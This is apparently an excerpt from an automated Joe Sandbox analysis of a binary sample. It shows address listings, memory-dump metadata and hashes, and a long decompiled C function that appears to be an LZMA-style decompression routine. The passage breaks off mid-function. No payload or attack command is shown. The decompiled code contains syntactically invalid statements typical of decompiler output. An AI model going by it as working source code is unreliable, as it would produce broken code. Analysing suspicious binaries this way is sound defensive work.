                                                0x0040742c
                                                0x00000000
                                                0x0040742c
                                                0x00406ded
                                                0x00406df0
                                                0x00406df3
                                                0x00406df6
                                                0x00406df9
                                                0x00406dfc
                                                0x00406dff
                                                0x00406e01
                                                0x00406e04
                                                0x00406e07
                                                0x00406e0a
                                                0x00406e0c
                                                0x00406e0c
                                                0x00406e0c
                                                0x00000000
                                                0x00000000
                                                0x00406f6e
                                                0x00406f6e
                                                0x00406f72
                                                0x00407438
                                                0x00000000
                                                0x00407438
                                                0x00406f78
                                                0x00406f7b
                                                0x00406f7e
                                                0x00406f81
                                                0x00406f83
                                                0x00406f83
                                                0x00406f83
                                                0x00406f86
                                                0x00406f89
                                                0x00406f8c
                                                0x00406f8f
                                                0x00406f92
                                                0x00406f95
                                                0x00406f96
                                                0x00406f98
                                                0x00406f98
                                                0x00406f98
                                                0x00406f9b
                                                0x00406f9e
                                                0x00406fa1
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa7
                                                0x00406fa9
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x00406fac
                                                0x00406fac
                                                0x00000000
                                                0x00406fac
                                                0x0040722d
                                                0x00407462
                                                0x00407484
                                                0x0040748a
                                                0x0040748c
                                                0x00407493
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00407499
                                                0x00407499
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                                • Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
                                                • Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                                • Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00406E9D() {
                                                				signed int _t539;
                                                				unsigned short _t540;
                                                				signed int _t541;
                                                				void _t542;
                                                				signed int _t543;
                                                				signed int _t544;
                                                				signed int _t573;
                                                				signed int _t576;
                                                				signed int _t597;
                                                				signed int* _t614;
                                                				void* _t621;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t621 - 0x40) != 1) {
                                                						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                						_t539 =  *(_t621 - 4) + 0x664;
                                                						 *(_t621 - 0x58) = _t539;
                                                						goto L68;
                                                					} else {
                                                						 *(__ebp - 0x84) = 8;
                                                						while(1) {
                                                							L132:
                                                							 *(_t621 - 0x54) = _t614;
                                                							while(1) {
                                                								L133:
                                                								_t540 =  *_t614;
                                                								_t597 = _t540 & 0x0000ffff;
                                                								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                								if( *(_t621 - 0xc) >= _t573) {
                                                									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                									 *(_t621 - 0x40) = 1;
                                                									_t541 = _t540 - (_t540 >> 5);
                                                									 *_t614 = _t541;
                                                								} else {
                                                									 *(_t621 - 0x10) = _t573;
                                                									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                								}
                                                								if( *(_t621 - 0x10) >= 0x1000000) {
                                                									goto L139;
                                                								}
                                                								L137:
                                                								if( *(_t621 - 0x6c) == 0) {
                                                									 *(_t621 - 0x88) = 5;
                                                									L170:
                                                									_t576 = 0x22;
                                                									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                									_t544 = 0;
                                                									L172:
                                                									return _t544;
                                                								}
                                                								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                								L139:
                                                								_t542 =  *(_t621 - 0x84);
                                                								while(1) {
                                                									 *(_t621 - 0x88) = _t542;
                                                									while(1) {
                                                										L1:
                                                										_t543 =  *(_t621 - 0x88);
                                                										if(_t543 > 0x1c) {
                                                											break;
                                                										}
                                                										switch( *((intOrPtr*)(_t543 * 4 +  &M004074A1))) {
                                                											case 0:
                                                												if( *(_t621 - 0x6c) == 0) {
                                                													goto L170;
                                                												}
                                                												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                												_t543 =  *( *(_t621 - 0x70));
                                                												if(_t543 > 0xe1) {
                                                													goto L171;
                                                												}
                                                												_t547 = _t543 & 0x000000ff;
                                                												_push(0x2d);
                                                												asm("cdq");
                                                												_pop(_t578);
                                                												_push(9);
                                                												_pop(_t579);
                                                												_t617 = _t547 / _t578;
                                                												_t549 = _t547 % _t578 & 0x000000ff;
                                                												asm("cdq");
                                                												_t612 = _t549 % _t579 & 0x000000ff;
                                                												 *(_t621 - 0x3c) = _t612;
                                                												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                													L10:
                                                													if(_t620 == 0) {
                                                														L12:
                                                														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                														goto L15;
                                                													} else {
                                                														goto L11;
                                                													}
                                                													do {
                                                														L11:
                                                														_t620 = _t620 - 1;
                                                														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                													} while (_t620 != 0);
                                                													goto L12;
                                                												}
                                                												if( *(_t621 - 4) != 0) {
                                                													GlobalFree( *(_t621 - 4)); // executed
                                                												}
                                                												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                												 *(_t621 - 4) = _t543;
                                                												if(_t543 == 0) {
                                                													goto L171;
                                                												} else {
                                                													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                													goto L10;
                                                												}
                                                											case 1:
                                                												L13:
                                                												__eflags =  *(_t621 - 0x6c);
                                                												if( *(_t621 - 0x6c) == 0) {
                                                													 *(_t621 - 0x88) = 1;
                                                													goto L170;
                                                												}
                                                												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                												_t45 = _t621 - 0x48;
                                                												 *_t45 =  *(_t621 - 0x48) + 1;
                                                												__eflags =  *_t45;
                                                												L15:
                                                												if( *(_t621 - 0x48) < 4) {
                                                													goto L13;
                                                												}
                                                												_t555 =  *(_t621 - 0x40);
                                                												if(_t555 ==  *(_t621 - 0x74)) {
                                                													L20:
                                                													 *(_t621 - 0x48) = 5;
                                                													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                													goto L23;
                                                												}
                                                												 *(_t621 - 0x74) = _t555;
                                                												if( *(_t621 - 8) != 0) {
                                                													GlobalFree( *(_t621 - 8)); // executed
                                                												}
                                                												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                												 *(_t621 - 8) = _t543;
                                                												if(_t543 == 0) {
                                                													goto L171;
                                                												} else {
                                                													goto L20;
                                                												}
                                                											case 2:
                                                												L24:
                                                												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                												 *(_t621 - 0x84) = 6;
                                                												 *(_t621 - 0x4c) = _t562;
                                                												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                												goto L132;
                                                											case 3:
                                                												L21:
                                                												__eflags =  *(_t621 - 0x6c);
                                                												if( *(_t621 - 0x6c) == 0) {
                                                													 *(_t621 - 0x88) = 3;
                                                													goto L170;
                                                												}
                                                												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                												_t67 = _t621 - 0x70;
                                                												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                												__eflags =  *_t67;
                                                												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                												L23:
                                                												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                												if( *(_t621 - 0x48) != 0) {
                                                													goto L21;
                                                												}
                                                												goto L24;
                                                											case 4:
                                                												L133:
                                                												_t540 =  *_t614;
                                                												_t597 = _t540 & 0x0000ffff;
                                                												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                												if( *(_t621 - 0xc) >= _t573) {
                                                													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                													 *(_t621 - 0x40) = 1;
                                                													_t541 = _t540 - (_t540 >> 5);
                                                													 *_t614 = _t541;
                                                												} else {
                                                													 *(_t621 - 0x10) = _t573;
                                                													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                												}
                                                												if( *(_t621 - 0x10) >= 0x1000000) {
                                                													goto L139;
                                                												}
                                                											case 5:
                                                												goto L137;
                                                											case 6:
                                                												__edx = 0;
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 4);
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x34) = 1;
                                                													 *(__ebp - 0x84) = 7;
                                                													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                													L132:
                                                													 *(_t621 - 0x54) = _t614;
                                                													goto L133;
                                                												}
                                                												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                												__esi =  *(__ebp - 0x60);
                                                												__cl = 8;
                                                												__cl = 8 -  *(__ebp - 0x3c);
                                                												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                												__ecx =  *(__ebp - 0x3c);
                                                												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                												__ecx =  *(__ebp - 4);
                                                												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                												__eflags =  *(__ebp - 0x38) - 4;
                                                												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                												if( *(__ebp - 0x38) >= 4) {
                                                													__eflags =  *(__ebp - 0x38) - 0xa;
                                                													if( *(__ebp - 0x38) >= 0xa) {
                                                														_t98 = __ebp - 0x38;
                                                														 *_t98 =  *(__ebp - 0x38) - 6;
                                                														__eflags =  *_t98;
                                                													} else {
                                                														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                													}
                                                												} else {
                                                													 *(__ebp - 0x38) = 0;
                                                												}
                                                												__eflags =  *(__ebp - 0x34) - __edx;
                                                												if( *(__ebp - 0x34) == __edx) {
                                                													__ebx = 0;
                                                													__ebx = 1;
                                                													goto L61;
                                                												} else {
                                                													__eax =  *(__ebp - 0x14);
                                                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                													__eflags = __eax -  *(__ebp - 0x74);
                                                													if(__eax >=  *(__ebp - 0x74)) {
                                                														__eax = __eax +  *(__ebp - 0x74);
                                                														__eflags = __eax;
                                                													}
                                                													__ecx =  *(__ebp - 8);
                                                													__ebx = 0;
                                                													__ebx = 1;
                                                													__al =  *((intOrPtr*)(__eax + __ecx));
                                                													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                													goto L41;
                                                												}
                                                											case 7:
                                                												goto L0;
                                                											case 8:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 4);
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x84) = 0xa;
                                                													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                												} else {
                                                													__eax =  *(__ebp - 0x38);
                                                													__ecx =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 0x38) + 0xf;
                                                													 *(__ebp - 0x84) = 9;
                                                													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                												}
                                                												while(1) {
                                                													L132:
                                                													 *(_t621 - 0x54) = _t614;
                                                													goto L133;
                                                												}
                                                											case 9:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													goto L89;
                                                												}
                                                												__eflags =  *(__ebp - 0x60);
                                                												if( *(__ebp - 0x60) == 0) {
                                                													goto L171;
                                                												}
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                												__eflags = _t258;
                                                												0 | _t258 = _t258 + _t258 + 9;
                                                												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                												goto L75;
                                                											case 0xa:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 4);
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x84) = 0xb;
                                                													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                													while(1) {
                                                														L132:
                                                														 *(_t621 - 0x54) = _t614;
                                                														goto L133;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x28);
                                                												goto L88;
                                                											case 0xb:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__ecx =  *(__ebp - 0x24);
                                                													__eax =  *(__ebp - 0x20);
                                                													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                												} else {
                                                													__eax =  *(__ebp - 0x24);
                                                												}
                                                												__ecx =  *(__ebp - 0x28);
                                                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                												L88:
                                                												__ecx =  *(__ebp - 0x2c);
                                                												 *(__ebp - 0x2c) = __eax;
                                                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                												L89:
                                                												__eax =  *(__ebp - 4);
                                                												 *(__ebp - 0x80) = 0x15;
                                                												__eax =  *(__ebp - 4) + 0xa68;
                                                												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                												goto L68;
                                                											case 0xc:
                                                												L99:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xc;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t334 = __ebp - 0x70;
                                                												 *_t334 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t334;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												__eax =  *(__ebp - 0x2c);
                                                												goto L101;
                                                											case 0xd:
                                                												L37:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xd;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t122 = __ebp - 0x70;
                                                												 *_t122 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t122;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L39:
                                                												__eax =  *(__ebp - 0x40);
                                                												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                													goto L48;
                                                												}
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													goto L54;
                                                												}
                                                												L41:
                                                												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                												 *(__ebp - 0x48) = __eax;
                                                												__eax = __eax + 1;
                                                												__eax = __eax << 8;
                                                												__eax = __eax + __ebx;
                                                												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edx = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													 *(__ebp - 0x40) = 1;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													__ebx = __ebx + __ebx + 1;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edx;
                                                													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L39;
                                                												} else {
                                                													goto L37;
                                                												}
                                                											case 0xe:
                                                												L46:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xe;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t156 = __ebp - 0x70;
                                                												 *_t156 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t156;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												while(1) {
                                                													L48:
                                                													__eflags = __ebx - 0x100;
                                                													if(__ebx >= 0x100) {
                                                														break;
                                                													}
                                                													__eax =  *(__ebp - 0x58);
                                                													__edx = __ebx + __ebx;
                                                													__ecx =  *(__ebp - 0x10);
                                                													__esi = __edx + __eax;
                                                													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                													__ax =  *__esi;
                                                													 *(__ebp - 0x54) = __esi;
                                                													__edi = __ax & 0x0000ffff;
                                                													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                													__eflags =  *(__ebp - 0xc) - __ecx;
                                                													if( *(__ebp - 0xc) >= __ecx) {
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                														__cx = __ax;
                                                														_t170 = __edx + 1; // 0x1
                                                														__ebx = _t170;
                                                														__cx = __ax >> 5;
                                                														__eflags = __eax;
                                                														 *__esi = __ax;
                                                													} else {
                                                														 *(__ebp - 0x10) = __ecx;
                                                														0x800 = 0x800 - __edi;
                                                														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                														__ebx = __ebx + __ebx;
                                                														 *__esi = __cx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													 *(__ebp - 0x44) = __ebx;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														continue;
                                                													} else {
                                                														goto L46;
                                                													}
                                                												}
                                                												L54:
                                                												_t173 = __ebp - 0x34;
                                                												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                												__eflags =  *_t173;
                                                												goto L55;
                                                											case 0xf:
                                                												L58:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xf;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t203 = __ebp - 0x70;
                                                												 *_t203 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t203;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L60:
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													L55:
                                                													__al =  *(__ebp - 0x44);
                                                													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                													goto L56;
                                                												}
                                                												L61:
                                                												__eax =  *(__ebp - 0x58);
                                                												__edx = __ebx + __ebx;
                                                												__ecx =  *(__ebp - 0x10);
                                                												__esi = __edx + __eax;
                                                												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													_t217 = __edx + 1; // 0x1
                                                													__ebx = _t217;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L60;
                                                												} else {
                                                													goto L58;
                                                												}
                                                											case 0x10:
                                                												L109:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0x10;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t365 = __ebp - 0x70;
                                                												 *_t365 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t365;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												goto L111;
                                                											case 0x11:
                                                												L68:
                                                												_t614 =  *(_t621 - 0x58);
                                                												 *(_t621 - 0x84) = 0x12;
                                                												while(1) {
                                                													L132:
                                                													 *(_t621 - 0x54) = _t614;
                                                													goto L133;
                                                												}
                                                											case 0x12:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 0x58);
                                                													 *(__ebp - 0x84) = 0x13;
                                                													__esi =  *(__ebp - 0x58) + 2;
                                                													while(1) {
                                                														L132:
                                                														 *(_t621 - 0x54) = _t614;
                                                														goto L133;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x4c);
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax =  *(__ebp - 0x4c) << 4;
                                                												__eflags = __eax;
                                                												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                												goto L130;
                                                											case 0x13:
                                                												__eflags =  *(__ebp - 0x40);
